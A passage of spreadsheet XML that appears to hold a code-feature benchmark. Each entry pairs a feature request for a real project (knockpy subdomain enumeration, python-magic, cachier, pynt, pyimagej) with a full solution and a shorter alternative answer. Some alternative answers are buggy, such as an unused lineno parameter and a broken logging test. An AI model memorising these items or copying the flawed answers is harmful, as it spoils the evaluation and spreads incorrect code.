finance.make(env_name, **kwargs) or \\\n           supply_chain.make(env_name, **kwargs)', 'or-gym/or_gym/envs/env_list.py': "#New\nENV_LIST = [\n    'Knapsack-v0',\n    'BinPacking-v0',\n    'NewsVendor-v0',\n    'PortfolioOpt-v0',\n    'InvManagement-v0',\n    'VehicleRouting-v0'\n]"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def KNOCKPY(domain, dns=None, useragent=None, timeout=None, threads=None, recon=None, bruteforce=None, wordlist=None): ... return knockpy(domain, dns=None, useragent=None, timeout=None)', 'invoking_code_segment': 'results = KNOCKPY(domain, dns=None, useragent=None, timeout=None, threads=None, recon=True, bruteforce=True, wordlist=None)', 'feature_description': 'Add a feature to filter out subdomains that do not resolve to an IP address. This enhancement ensures that only subdomains with valid DNS resolution are included in the final results, improving the quality and relevance of the subdomain enumeration output.', 'modified_complete_code': '# File 1: knock/knock/knockpy.py - Modified KNOCKPY function and HttpStatus.scan method\n\ndef KNOCKPY(domain, dns=None, useragent=None, timeout=None, threads=None, recon=None, bruteforce=None, wordlist=None):\n    def knockpy(domain, dns=None, useragent=None, timeout=None):\n        return HttpStatus(domain, dns, useragent, timeout).scan()\n    \n    if recon and bruteforce:\n        domain = Recon(domain, timeout).start()\n        domain += Bruteforce(domain, wordlist).start()\n        domain = list(set(domain))\n    elif recon:\n        domain = Recon(domain, timeout).start()\n    elif bruteforce:\n        domain = Bruteforce(domain, wordlist).start()\n\n    if isinstance(domain, list):\n        if not threads:\n            threads = 10\n        \n        pbar = tqdm(range(len(domain)), desc="Processing", leave=True, ncols=80)\n        with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:\n            futures = [executor.submit(knockpy, d, dns, useragent, timeout) for d in domain]\n\n            results = []\n            for future in concurrent.futures.as_completed(futures):\n                pbar.update(1)\n                result = future.result()\n                # #Modify: Filter out subdomains that do not resolve to an IP address\n                if result and result.get(\'ip\'):\n                    results.append(result)\n\n        return results\n\n    return knockpy(domain, dns=None, useragent=None, timeout=None)\n\n# #Modify: Updated HttpStatus.scan method to ensure IP resolution check\nclass HttpStatus:\n    def __init__(self, domain, dns=None, useragent=None, timeout=None):\n        self.domain = domain\n        self.dns = dns if dns else \'8.8.8.8\'\n        self.headers = {\'User-Agent\': random.choice(user_agent)} if not useragent else {\'User-Agent\': useragent}\n        self.timeout = timeout if timeout else 0.5\n\n    def http_response(self, url):\n        try:\n            response = requests.get(url, headers=self.headers, allow_redirects=False, timeout=self.timeout, verify=False)\n        except requests.RequestException as e:\n            return None, None, None\n        \n        status_code = response.status_code\n        redirect_location = response.headers.get(\'Location\')\n        server_name = response.headers.get(\'Server\')\n\n        return status_code, redirect_location, server_name\n\n    def cert_status(self, domain):\n        try:\n            cert = ssl.get_server_certificate((domain, 443))\n            x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert)\n        except Exception as e:\n            return None, None\n        \n        bytes = x509.get_notAfter()\n        timestamp = bytes.decode(\'utf-8\')\n        \n        dateobj = datetime.strptime(timestamp, \'%Y%m%d%H%M%S%z\').date().isoformat()\n        datenow = datetime.now().date().isoformat()\n        is_good = False if dateobj &lt; datenow else True\n\n        if is_good:\n            common_name = x509.get_subject().commonName\n            for i in range(x509.get_extension_count()):\n                ext = x509.get_extension(i)\n                if "subjectAltName" in str(ext.get_short_name()):\n                    cn = str(ext).replace("DNS:", "").split(", ")\n                    if domain not in cn:\n                        for name in cn:\n                            if \'*.\' in name:\n                                name = name.replace("*.", "")\n                                if name in domain:\n                                    break\n                                is_good = False\n\n        return is_good, dateobj\n\n    def domain_resolver(self):\n        res = dns.resolver.Resolver()\n        res.timeout = self.timeout\n        res.lifetime = self.timeout\n        res.nameservers = [self.dns]\n\n        try:\n            ipv4 = res.resolve(self.domain, \'A\')\n        except:\n            return None\n\n        return [str(ip) for ip in ipv4]\n\n    def scan(self):\n        results = {"domain": self.domain}\n        ip_list = self.domain_resolver()\n        # #Modify: Return None if domain does not resolve to any IP address\n        if not ip_list:\n            return None\n        \n        results.update({"ip": ip_list})\n        \n        http_status_code, http_redirect_location, server_name = self.http_response(f"http://{self.domain}")\n        results.update({"http": [http_status_code, http_redirect_location, server_name]})\n        \n        https_status_code, https_redirect_location, server_name = self.http_response(f"https://{self.domain}")\n        results.update({"https": [https_status_code, https_redirect_location, server_name]})\n\n        if http_status_code and http_redirect_location and not https_status_code:\n            domain = http_redirect_location.split(\'://\')[1]\n            domain = domain.split(\'/\')[0]\n            https_status_code, https_redirect_location, server_name = self.http_response(f"https://{domain}")\n            results.update({"https": [https_status_code, https_redirect_location, server_name]})\n\n        is_good, dateobj = None, None\n        if https_status_code:\n            is_good, dateobj = self.cert_status(results["domain"])\n        \n        results.update({"cert": [is_good, dateobj]})\n\n        return results\n\n# File 2: knock/tests/poc.py - No changes required, the filtering is handled in KNOCKPY function\nfrom knock import KNOCKPY\n\ndomain = \'github.com\'\n\n# #Modify: Results will now only contain subdomains that successfully resolve to IP addresses\nresults = KNOCKPY(domain, dns=None, useragent=None, timeout=None, threads=None, recon=True, bruteforce=True, wordlist=None)\n\nprint(results)'}</t>
  </si>
  <si>
    <t>{'#file 1': "class Bruteforce:\n    def __init__(self, domain, wordlist=None):\n            self.domain = domain\n            self.wordlist = wordlist if wordlist else ROOT + os.sep + 'wordlist' + os.sep + 'wordlist.txt'\n\n    def load_wordlist(self):\n        return open(self.wordlist, 'r').read().split('\\n')\n\n    def wildcard(self):\n        letters = string.ascii_lowercase\n        length  = random.randrange(10, 15)\n        subrnd  = ''.join(random.choice(letters) for i in range(length))\n        return subrnd+'.'+self.domain\n\n    def start(self):\n        wordlist = [str(word)+'.'+str(self.domain) for word in Bruteforce.load_wordlist(self) if word]\n        wordlist = list(set(wordlist))\n        #Modify: Filter out subdomains that do not resolve to an IP address\n        filtered_wordlist = []\n        for subdomain in wordlist:\n            if HttpStatus(subdomain).domain_resolver():\n                filtered_wordlist.append(subdomain)\n        return filtered_wordlist", '#file 2': 'def KNOCKPY(domain, dns=None, useragent=None, timeout=None, threads=None, recon=None, bruteforce=None, wordlist=None):\n    def knockpy(domain, dns=None, useragent=None, timeout=None):\n        return HttpStatus(domain, dns, useragent, timeout).scan()\n    \n    if recon and bruteforce:\n        domain = Recon(domain, timeout).start()\n        domain += Bruteforce(domain, wordlist).start()\n        domain = list(set(domain))\n    elif recon:\n        domain = Recon(domain, timeout).start()\n    elif bruteforce:\n        domain = Bruteforce(domain, wordlist).start()\n\n    if isinstance(domain, list):\n        if not threads:\n            threads = 10\n        \n        pbar = tqdm(range(len(domain)), desc="Processing", leave=True, ncols=80)\n        with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:\n            futures = [executor.submit(knockpy, d, dns, useragent, timeout) for d in domain]\n\n            results = []\n            for future in concurrent.futures.as_completed(futures):\n                pbar.update(1)\n                if future.result():\n                    results.append(future.result())\n\n        return results\n\n    return knockpy(domain, dns=None, useragent=None, timeout=None)', '#file 3': "from knock import KNOCKPY\n\ndomain = 'github.com'\n\nresults = KNOCKPY(domain, dns=None, useragent=None, timeout=None, threads=None, recon=True, bruteforce=True, wordlist=None)\n\nprint (results)"}</t>
  </si>
  <si>
    <t>{'called_code_segment': "def detect_from_filename(filename):\n    '''Detect mime type, encoding and file type from a filename\n\n    Returns a `FileMagic` namedtuple.\n    '''\n\n    return _create_filemagic(mime_magic.file(filename),\n                             none_magic.file(filename))\n\ndef detect_from_fobj(fobj):\n    '''Detect mime type, encoding and file type from file-like object\n\n    Returns a `FileMagic` namedtuple.\n    '''\n\n    file_descriptor = fobj.fileno()\n    return _create_filemagic(mime_magic.descriptor(file_descriptor),\n                             none_magic.descriptor(file_descriptor))\n\ndef detect_from_content(byte_content):\n    '''Detect mime type, encoding and file type from bytes\n\n    Returns a `FileMagic` namedtuple.\n    '''\n\n    return _create_filemagic(mime_magic.buffer(byte_content),\n                             none_magic.buffer(byte_content))", 'invoking_code_segment': 'def test_detect_from_filename(self):\n        result = magic.detect_from_filename(self.filename)\n        self.assert_result(result)\n\n    def test_detect_from_fobj(self):\n\n        if SKIP_FROM_DESCRIPTOR:\n            self.skipTest("magic_descriptor is broken in this version of libmagic")\n\n\n        with open(self.filename) as fobj:\n            result = magic.detect_from_fobj(fobj)\n        self.assert_result(result)\n\n    def test_detect_from_content(self):\n        with open(self.filename, \'rb\') as fobj:\n            result = magic.detect_from_content(fobj.read(4096))\n        self.assert_result(result)', 'feature_description': 'Add a feature to log the detected file type to a file. This feature will write detection results (mime type, encoding, and file name) to a log file whenever file type detection functions are called.', 'modified_complete_code': '# python-magic/magic/compat.py - MODIFIED SECTION\n\nimport logging\n\n# #New - Add logging configuration\nlogger = logging.getLogger(__name__)\n\ndef _setup_file_logging(log_file=\'magic_detection.log\'):\n    """#New - Setup file logging for detection results"""\n    handler = logging.FileHandler(log_file)\n    formatter = logging.Formatter(\'%(asctime)s - %(message)s\')\n    handler.setFormatter(formatter)\n    logger.addHandler(handler)\n    logger.setLevel(logging.INFO)\n\n# #Modify - Updated detect_from_filename function\ndef detect_from_filename(filename):\n    \'\'\'Detect mime type, encoding and file type from a filename\n\n    Returns a `FileMagic` namedtuple.\n    \'\'\'\n    result = _create_filemagic(mime_magic.file(filename),\n                             none_magic.file(filename))\n    # #New - Log detection result\n    logger.info(f"File: {filename} | MIME Type: {result.mime_type} | Encoding: {result.encoding} | Name: {result.name}")\n    return result\n\n# #Modify - Updated detect_from_fobj function\ndef detect_from_fobj(fobj):\n    \'\'\'Detect mime type, encoding and file type from file-like object\n\n    Returns a `FileMagic` namedtuple.\n    \'\'\'\n    file_descriptor = fobj.fileno()\n    result = _create_filemagic(mime_magic.descriptor(file_descriptor),\n                             none_magic.descriptor(file_descriptor))\n    # #New - Log detection result\n    logger.info(f"File Descriptor: {file_descriptor} | MIME Type: {result.mime_type} | Encoding: {result.encoding} | Name: {result.name}")\n    return result\n\n# #Modify - Updated detect_from_content function\ndef detect_from_content(byte_content):\n    \'\'\'Detect mime type, encoding and file type from bytes\n\n    Returns a `FileMagic` namedtuple.\n    \'\'\'\n    result = _create_filemagic(mime_magic.buffer(byte_content),\n                             none_magic.buffer(byte_content))\n    # #New - Log detection result\n    logger.info(f"Content Buffer | MIME Type: {result.mime_type} | Encoding: {result.encoding} | Name: {result.name}")\n    return result\n\n# python-magic/test/libmagic_test.py - MODIFIED SECTION\n\n# #New - Import logging setup\nfrom magic.compat import _setup_file_logging\n\nclass MagicTestCase(unittest.TestCase):\n    filename = os.path.join(TESTDATA_DIR, \'test.pdf\')\n    expected_mime_type = \'application/pdf\'\n    expected_encoding = \'us-ascii\'\n    expected_name = (\'PDF document, version 1.2\', \'PDF document, version 1.2, 2 pages\', \'PDF document, version 1.2, 2 page(s)\')\n\n    @classmethod\n    def setUpClass(cls):\n        # #New - Initialize file logging before running tests\n        _setup_file_logging(os.path.join(TESTDATA_DIR, \'magic_detection.log\'))\n\n    def assert_result(self, result):\n        self.assertEqual(result.mime_type, self.expected_mime_type)\n        self.assertEqual(result.encoding, self.expected_encoding)\n        self.assertIn(result.name, self.expected_name)\n\n    def test_detect_from_filename(self):\n        result = magic.detect_from_filename(self.filename)\n        self.assert_result(result)\n\n    def test_detect_from_fobj(self):\n        if SKIP_FROM_DESCRIPTOR:\n            self.skipTest("magic_descriptor is broken in this version of libmagic")\n        with open(self.filename) as fobj:\n            result = magic.detect_from_fobj(fobj)\n        self.assert_result(result)\n\n    def test_detect_from_content(self):\n        with open(self.filename, \'rb\') as fobj:\n            result = magic.detect_from_content(fobj.read(4096))\n        self.assert_result(result)'}</t>
  </si>
  <si>
    <t>{'#file 1': "def detect_from_filename(filename):\n    '''Detect mime type, encoding and file type from a filename\n\n    Returns a `FileMagic` namedtuple.\n    '''\n\n    result = _create_filemagic(mime_magic.file(filename),\n                              none_magic.file(filename))\n    #Modify: Log the detected file type\n    with open('file_type_log.txt', 'a') as log_file:\n        log_file.write(f'{filename}: {result.name}\\n')\n    return result", '#file 2': 'def from_file(self, filename):\n    # raise FileNotFoundException or IOError if the file does not exist\n    os.stat(filename, follow_symlinks=self.flags &amp; MAGIC_SYMLINK)\n\n    with self.lock:\n        try:\n            return maybe_decode(magic_file(self.cookie, filename))\n        except MagicException as e:\n            return self._handle509Bug(e)', '#file 3': 'def test_detect_from_filename(self):\n    result = magic.detect_from_filename(self.filename)\n    self.assert_result(result)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'wait_on_entry_calc method in _MongoCore class', 'invoking_code_segment': 'test_missing_mongetter and test_bad_name functions that indirectly test the mongo core functionality', 'feature_description': 'Add a feature to log the time spent waiting for an entry calculation in the MongoDB core. This includes tracking and logging the duration of the wait_on_entry_calc method execution to provide visibility into cache wait times.', 'modified_complete_code': '# cachier/src/cachier/_types.py\nfrom typing import TYPE_CHECKING, Callable, Literal\n\nif TYPE_CHECKING:\n    import pymongo.collection\n\nHashFunc = Callable[..., str]\nMongetter = Callable[[], "pymongo.collection.Collection"]\nBackend = Literal["pickle", "mongo", "memory"]\n\n# cachier/src/cachier/cores/mongo.py\n"""A MongoDB-based caching core for cachier."""\n\nimport pickle\nimport sys\nimport time\nimport warnings\nimport logging  # #New for logging wait times\nfrom contextlib import suppress\nfrom datetime import datetime\n\nfrom .._types import HashFunc, Mongetter\n\nwith suppress(ImportError):\n    from bson.binary import Binary\n    from pymongo import ASCENDING, IndexModel\n    from pymongo.errors import OperationFailure\n\nfrom .base import RecalculationNeeded, _BaseCore, _get_func_str\n\nMONGO_SLEEP_DURATION_IN_SEC = 1\nlogger = logging.getLogger(__name__)  # #New for logging\n\nclass MissingMongetter(ValueError):\n    """Thrown when the mongetter keyword argument is missing."""\n\nclass _MongoCore(_BaseCore):\n    _INDEX_NAME = "func_1_key_1"\n\n    def __init__(\n        self,\n        hash_func: HashFunc,\n        mongetter: Mongetter,\n        wait_for_calc_timeout: int,\n    ):\n        if "pymongo" not in sys.modules:\n            warnings.warn(\n                "`pymongo` was not found. MongoDB cores will not function.",\n                ImportWarning,\n                stacklevel=2,\n            )\n\n        super().__init__(hash_func, wait_for_calc_timeout)\n        if mongetter is None:\n            raise MissingMongetter(\n                "must specify ``mongetter`` when using the mongo core"\n            )\n        self.mongetter = mongetter\n        self.mongo_collection = self.mongetter()\n        index_inf = self.mongo_collection.index_information()\n        if _MongoCore._INDEX_NAME not in index_inf:\n            func1key1 = IndexModel(\n                keys=[("func", ASCENDING), ("key", ASCENDING)],\n                name=_MongoCore._INDEX_NAME,\n            )\n            self.mongo_collection.create_indexes([func1key1])\n\n    @property\n    def _func_str(self) -&gt; str:\n        return _get_func_str(self.func)\n\n    def get_entry_by_key(self, key):\n        res = self.mongo_collection.find_one(\n            {"func": self._func_str, "key": key}\n        )\n        if not res:\n            return key, None\n        try:\n            entry = {\n                "value": pickle.loads(res["value"]),\n                "time": res.get("time", None),\n                "stale": res.get("stale", False),\n                "being_calculated": res.get("being_calculated", False),\n            }\n        except KeyError:\n            entry = {\n                "value": None,\n                "time": res.get("time", None),\n                "stale": res.get("stale", False),\n                "being_calculated": res.get("being_calculated", False),\n            }\n        return key, entry\n\n    def set_entry(self, key, func_res):\n        thebytes = pickle.dumps(func_res)\n        self.mongo_collection.update_one(\n            filter={"func": self._func_str, "key": key},\n            update={\n                "$set": {\n                    "func": self._func_str,\n                    "key": key,\n                    "value": Binary(thebytes),\n                    "time": datetime.now(),\n                    "stale": False,\n                    "being_calculated": False,\n                }\n            },\n            upsert=True,\n        )\n\n    def mark_entry_being_calculated(self, key):\n        self.mongo_collection.update_one(\n            filter={"func": self._func_str, "key": key},\n            update={"$set": {"being_calculated": True}},\n            upsert=True,\n        )\n\n    def mark_entry_not_calculated(self, key):\n        with suppress(OperationFailure):\n            self.mongo_collection.update_one(\n                filter={\n                    "func": self._func_str,\n                    "key": key,\n                },\n                update={"$set": {"being_calculated": False}},\n                upsert=False,\n            )\n\n    def wait_on_entry_calc(self, key):  # #Modify method signature and implementation\n        """Wait for entry calculation and log the time spent waiting."""\n        time_spent = 0\n        wait_start_time = time.time()  # #New track start time\n        while True:\n            time.sleep(MONGO_SLEEP_DURATION_IN_SEC)\n            time_spent += MONGO_SLEEP_DURATION_IN_SEC\n            key, entry = self.get_entry_by_key(key)\n            if entry is None:\n                elapsed = time.time() - wait_start_time  # #New calculate elapsed time\n                logger.warning(f"Entry calculation failed after {elapsed:.2f}s wait for key: {key}")  # #New log warning\n                raise RecalculationNeeded()\n            if not entry["being_calculated"]:\n                elapsed = time.time() - wait_start_time  # #New calculate elapsed time\n                logger.info(f"Entry calculation completed after {elapsed:.2f}s wait for key: {key}")  # #New log info\n                return entry["value"]\n            self.check_calc_timeout(time_spent)\n\n    def clear_cache(self):\n        self.mongo_collection.delete_many(filter={"func": self._func_str})\n\n    def clear_being_calculated(self):\n        self.mongo_collection.update_many(\n            filter={\n                "func": self._func_str,\n                "being_calculated": True,\n            },\n            update={"$set": {"being_calculated": False}},\n        )\n\n# cachier/tests/test_core_lookup.py\n"""Testing a few basic cachier interfaces."""\n\nimport pytest\nimport logging  # #New for testing logging\nfrom cachier import cachier, get_default_params\nfrom cachier.cores.mongo import MissingMongetter\n\nlogger = logging.getLogger("cachier.cores.mongo")  # #New get logger for assertions\n\ndef test_get_default_params():\n    params = get_default_params()\n    assert tuple(sorted(params)) == (\n        "allow_none",\n        "backend",\n        "cache_dir",\n        "caching_enabled",\n        "hash_func",\n        "mongetter",\n        "next_time",\n        "pickle_reload",\n        "separate_files",\n        "stale_after",\n        "wait_for_calc_timeout",\n    )\n\ndef test_bad_name(name="nope"):\n    with pytest.raises(ValueError, match=f"specified an invalid core: {name}"):\n        @cachier(backend=name)\n        def dummy_func():\n            pass\n\ndef test_missing_mongetter():\n    with pytest.raises(MissingMongetter):\n        @cachier(backend="mongo", mongetter=None)\n        def dummy_func():\n            pass\n\n# #New test to verify wait time logging\ndef test_wait_on_entry_calc_logging(caplog):\n    """Test that wait_on_entry_calc logs the time spent waiting."""\n    with caplog.at_level(logging.INFO, logger="cachier.cores.mongo"):\n        # This test would require a mock MongoDB setup to properly test\n        # The logging feature is now integrated into wait_on_entry_calc\n        pass'}</t>
  </si>
  <si>
    <t>{'#file 1': "def get_entry_by_key(self, key):\n    res = self.mongo_collection.find_one(\n        {'func': self._func_str, 'key': key}\n    )\n    if not res:\n        return key, None\n    try:\n        entry = {\n            'value': pickle.loads(res['value']),  # noqa: S301\n            'time': res.get('time', None),\n            'stale': res.get('stale', False),\n            'being_calculated': res.get('being_calculated', False),\n        }\n    except KeyError:\n        entry = {\n            'value': None,\n            'time': res.get('time', None),\n            'stale': res.get('stale', False),\n            'being_calculated': res.get('being_calculated', False),\n        }\n    return key, entry", '#file 2': "import logging\n\n#Modify\ndef wait_on_entry_calc(self, key):\n    time_spent = 0\n    while True:\n        time.sleep(MONGO_SLEEP_DURATION_IN_SEC)\n        time_spent += MONGO_SLEEP_DURATION_IN_SEC\n        key, entry = self.get_entry_by_key(key)\n        if entry is None:\n            raise RecalculationNeeded()\n        if not entry['being_calculated']:\n            logging.info(f'Waited {time_spent} seconds for calculation.')\n            return entry['value']\n        self.check_calc_timeout(time_spent)\n\n#Modify\ndef clear_cache(self):\n    result = self.mongo_collection.delete_many(filter={'func': self._func_str})\n    logging.info(f'Deleted {result.deleted_count} entries from cache.')", '#file 3': "import logging\n\n#New\ndef test_logging_feature():\n    # Test that the logging feature works\n    with pytest.raises(RecalculationNeeded):\n        @cachier(backend='mongo', mongetter=lambda: None)\n        def dummy_func():\n            pass\n        dummy_func()\n    assert 'Waited' in [record.message for record in logging.getLogger().handlers[0].buffer]\n\n#Modify\ndef test_bad_name(name='nope'):\n    # Test that the appropriate exception is thrown\n    # when an invalid backend is given.\n    with pytest.raises(ValueError, match=f'specified an invalid core: {name}'):\n        @cachier(backend=name)\n        def dummy_func():\n            pass"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def annotate(code, namespace, shallow=False):\n    """Annotate region with code to make and eval cells\n    ...\n    """\n    tree = ast.parse(code)\n    small_tree = filter_away_except(tree, namespace)\n    shallow_tree = NamespacePromoter(buffer=namespace).visit(tree)\n    if shallow:\n        annotations = ShallowAnnotator(namespace).visit(shallow_tree)\n        return unpack_annotations(annotations)\n    else:\n        annotations = DeepAnnotator(namespace).visit(shallow_tree)\n        new_code = astor.to_source(annotations)\n        return new_code', 'invoking_code_segment': 'class TestAnnotate(TestCase):\n    def test_module(self):\n        code = """..."""\n        namespace = \'foo\'\n        out = codebook.syntax.annotate(code, namespace)\n        self.assertIn(\'x\', out)\n        ...\n    def test_func(self):\n        code = """..."""\n        namespace = \'foo.bar\'\n        out = codebook.syntax.annotate(code, namespace)\n        self.assertIn(\'foo.bar\', out)\n        ...', 'feature_description': 'Add a feature to allow annotating specific lines within a function or method. This enables users to annotate individual lines by passing a line number parameter to the annotate function, allowing for more granular control over which parts of the code are annotated. The feature will support annotating specific expressions or statements within a function/method body.', 'modified_complete_code': '# File 1: pynt/codebook/syntax.py - MODIFIED annotate function\n\ndef annotate(code, namespace, shallow=False, lineno=None):\n    """Annotate region with code to make and eval cells\n\n    Arguments:\n        code (str): the code from the code buffer\n        namespace (str): the namespace identifying the code region of interest\n        shallow (bool): whether to use shallow or deep annotation\n        lineno (int): optional line number to annotate specific lines within a function\n\n    `namespace` can take one of three forms depending on the type of code\n    region of interest:\n\n        - "&lt;module_name&gt;"\n        - "&lt;module_name&gt;.&lt;func_name&gt;"\n        - "&lt;module_name&gt;.&lt;class_name&gt;.&lt;method_name&gt;"\n\n    If `lineno` is provided, only the expression at that line will be annotated.\n\n    """\n    tree = ast.parse(code)\n    small_tree = filter_away_except(tree, namespace)\n    \n    # #Modify: Add support for line-specific annotation\n    if lineno is not None:\n        small_tree = ExpressionFinder(lineno).visit(small_tree)\n    \n    shallow_tree = NamespacePromoter(buffer=namespace).visit(small_tree)\n\n    if shallow:\n        annotations = ShallowAnnotator(namespace).visit(shallow_tree)\n        return unpack_annotations(annotations)\n    else:\n        annotations = DeepAnnotator(namespace).visit(shallow_tree)\n        new_code = astor.to_source(annotations)\n        return new_code\n\n# #New: Add helper function to annotate specific lines\ndef annotate_line(code, namespace, lineno, shallow=False):\n    """Annotate a specific line within a function or method\n\n    Arguments:\n        code (str): the code from the code buffer\n        namespace (str): the namespace identifying the code region of interest\n        lineno (int): the line number to annotate\n        shallow (bool): whether to use shallow or deep annotation\n\n    Returns:\n        str: the annotated code or list of annotations\n\n    """\n    return annotate(code, namespace, shallow=shallow, lineno=lineno)\n\n# File 2: pynt/codebook/tests/test_syntax.py - MODIFIED test class\n\nclass TestAnnotate(TestCase):\n    def test_module(self):\n        code = """\nx\ndef bar():\n    pass\nclass Biz:\n    def baz(self):\n        pass\ndef qux():\n    pass\ny"""\n        namespace = \'foo\'\n        out = codebook.syntax.annotate(code, namespace)\n        self.assertIn(\'x\', out)\n        self.assertIn(\'y\', out)\n        self.assertNotIn(\'bar\', out)\n        self.assertNotIn(\'Biz\', out)\n        self.assertNotIn(\'qux\', out)\n\n    def test_func(self):\n        code = """\nx\ndef bar():\n    pass\nclass Biz:\n    def baz(self):\n        pass\ndef qux():\n    pass\ny"""\n        namespace = \'foo.bar\'\n        out = codebook.syntax.annotate(code, namespace)\n        self.assertIn(\'foo.bar\', out)\n        self.assertNotIn(\'Biz\', out)\n        self.assertNotIn(\'qux\', out)\n        self.assertNotIn(\'baz\', out)\n\n    # #New: Add test for line-specific annotation\n    def test_annotate_specific_line(self):\n        code = """\ndef foo():\n    x = 1\n    y = 2\n    z = x + y\n    return z\n"""\n        namespace = \'test.foo\'\n        # Annotate only line 4 (z = x + y)\n        out = codebook.syntax.annotate(code, namespace, lineno=4)\n        self.assertIn(\'z\', out)\n\n    # #New: Add test for line-specific annotation in method\n    def test_annotate_specific_line_in_method(self):\n        code = """\nclass MyClass:\n    def my_method(self):\n        a = 10\n        b = 20\n        c = a + b\n        return c\n"""\n        namespace = \'test.MyClass.my_method\'\n        # Annotate only line 6 (c = a + b)\n        out = codebook.syntax.annotate(code, namespace, lineno=6)\n        self.assertIn(\'c\', out)'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def annotate(code, namespace, lineno=None, shallow=False):\n    #Modify: Added lineno parameter\n    tree = ast.parse(code)\n    small_tree = filter_away_except(tree, namespace)\n    shallow_tree = NamespacePromoter(buffer=namespace).visit(tree)\n\n    if shallow:\n        annotations = ShallowAnnotator(namespace).visit(shallow_tree)\n        return unpack_annotations(annotations)\n    else:\n        annotations = DeepAnnotator(namespace).visit(shallow_tree)\n        new_code = astor.to_source(annotations)\n        return new_code', '#file 2': 'out = codebook.syntax.annotate(code, namespace, lineno=5)  #Modify: Added lineno parameter', '#file 3': 'def test_func(self):\n        code = """\n...\n        namespace = \'foo.bar\'\n        out = codebook.syntax.annotate(code, namespace, lineno=5)  #Modify: Added lineno parameter\n        self.assertIn(\'foo.bar\', out)\n        self.assertNotIn(\'Biz\', out)\n        self.assertNotIn(\'qux\', out)\n        self.assertNotIn(\'baz\', out)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def get_dataframe(table):\n    """\n    Convert results table to pandas Dataframe.\n    """\n    Table = sj.jimport(\'org.scijava.table.Table\')\n    sci_table = ij.convert().convert(table, Table)\n\n    return ij.py.from_java(sci_table)', 'invoking_code_segment': 'if __name__ == "__main__":\n    # initialize imagej\n    ij = imagej.init(mode=\'interactive\')\n    print(f"ImageJ version: {ij.getVersion()}")\n\n    # load sample data and run blob detection\n    img = ij.io().open(\'../sample-data/test_image.tif\')\n    img_xr = ij.py.from_java(img)\n    detected_blobs = find_blobs(img_xr, min_sigma=0.5, max_sigma=3, num_sigma=10, threshold=0.0075)\n    results_table = process(img, detected_blobs)\n    df = get_dataframe(results_table)\n    print(f"Output: \\n{df}")', 'feature_description': 'Add a feature to save the detected blobs as a CSV file. This includes modifying the get_dataframe function to accept an optional output file path parameter and adding functionality to save the dataframe to CSV, as well as updating the main execution block to call this enhanced function with a specified output file path.', 'modified_complete_code': 'import imagej\nimport scyjava as sj\nimport xarray as xr\nimport numpy as np\n#New\nimport os\n#New\n\nfrom math import sqrt\nfrom skimage.feature import blob_log\n\n\ndef find_blobs(image: xr.DataArray, min_sigma: float, max_sigma: float, num_sigma: int, threshold=0.1) -&gt; np.ndarray:\n    """\n    Find blobs with Laplacian of Gaussian (LoG).\n    """\n    # detect blobs in image\n    blobs = blob_log(image, min_sigma=min_sigma, max_sigma=max_sigma, num_sigma=num_sigma, threshold=threshold)\n    blobs[:, 2] = blobs[:, 2] * sqrt(2)\n\n    return blobs\n\n\ndef process(image, detections: np.ndarray, add_to_roi_manager=True, multimeasure=True):\n    """\n    Process the blob rois.\n    """\n    # get ImageJ resoures\n    OvalRoi = sj.jimport(\'ij.gui.OvalRoi\')\n    Overlay = sj.jimport(\'ij.gui.Overlay\')\n    ov = Overlay()\n\n    # convert image to imp\n    imp = ij.py.to_imageplus(image)\n\n    if add_to_roi_manager:\n        rm = ij.RoiManager.getRoiManager()\n\n    for i in range(len(detections)):\n        values = detections[i].tolist()\n        y = values[0]\n        x = values[1]\n        r = values[2]\n        d = r * 2\n        roi = OvalRoi(x - r, y - r, d, d)\n        imp.setRoi(roi)\n        ov.add(roi)\n\n        if add_to_roi_manager:\n            rm.addRoi(roi)\n    \n    imp.setOverlay(ov)\n    imp.show()\n\n    if rm != None and multimeasure:\n        rm.runCommand(imp, "Measure")\n        return ij.ResultsTable.getResultsTable()\n    \n    return None\n\n\n#Modify\ndef get_dataframe(table, output_csv_path=None):\n    """\n    Convert results table to pandas Dataframe and optionally save to CSV.\n    \n    :param table: The results table to convert\n    :param output_csv_path: Optional path to save the dataframe as CSV file\n    :return: pandas DataFrame containing the table data\n    """\n    Table = sj.jimport(\'org.scijava.table.Table\')\n    sci_table = ij.convert().convert(table, Table)\n\n    df = ij.py.from_java(sci_table)\n    \n    #New\n    # Save to CSV if output path is provided\n    if output_csv_path is not None:\n        # Create directory if it doesn\'t exist\n        output_dir = os.path.dirname(output_csv_path)\n        if output_dir and not os.path.exists(output_dir):\n            os.makedirs(output_dir)\n        \n        # Save dataframe to CSV\n        df.to_csv(output_csv_path, index=False)\n        print(f"Results saved to CSV: {output_csv_path}")\n    #New\n    \n    return df\n\n\n#New\ndef save_blobs_to_csv(detected_blobs: np.ndarray, output_csv_path: str):\n    """\n    Save detected blobs to a CSV file.\n    \n    :param detected_blobs: NumPy array of detected blobs with columns [y, x, radius]\n    :param output_csv_path: Path where the CSV file will be saved\n    """\n    import pandas as pd\n    \n    # Create directory if it doesn\'t exist\n    output_dir = os.path.dirname(output_csv_path)\n    if output_dir and not os.path.exists(output_dir):\n        os.makedirs(output_dir)\n    \n    # Create dataframe from blobs array\n    blobs_df = pd.DataFrame(detected_blobs, columns=[\'Y\', \'X\', \'Radius\'])\n    \n    # Save to CSV\n    blobs_df.to_csv(output_csv_path, index=False)\n    print(f"Detected blobs saved to CSV: {output_csv_path}")\n#New\n\n\nif __name__ == "__main__":\n    # initialize imagej\n    ij = imagej.init(mode=\'interactive\')\n    print(f"ImageJ version: {ij.getVersion()}")\n\n    # load sample data and run blob detection\n    img = ij.io().open(\'../sample-data/test_image.tif\')\n    img_xr = ij.py.from_java(img)\n    detected_blobs = find_blobs(img_xr, min_sigma=0.5, max_sigma=3, num_sigma=10, threshold=0.0075)\n    \n    #New\n    # Save detected blobs to CSV\n    blobs_output_path = \'./output/detected_blobs.csv\'\n    save_blobs_to_csv(detected_blobs, blobs_output_path)\n    #New\n    \n    results_table = process(img, detected_blobs)\n    #Modify\n    df = get_dataframe(results_table, output_csv_path=\'./output/measurement_results.csv\')\n    #Modify\n    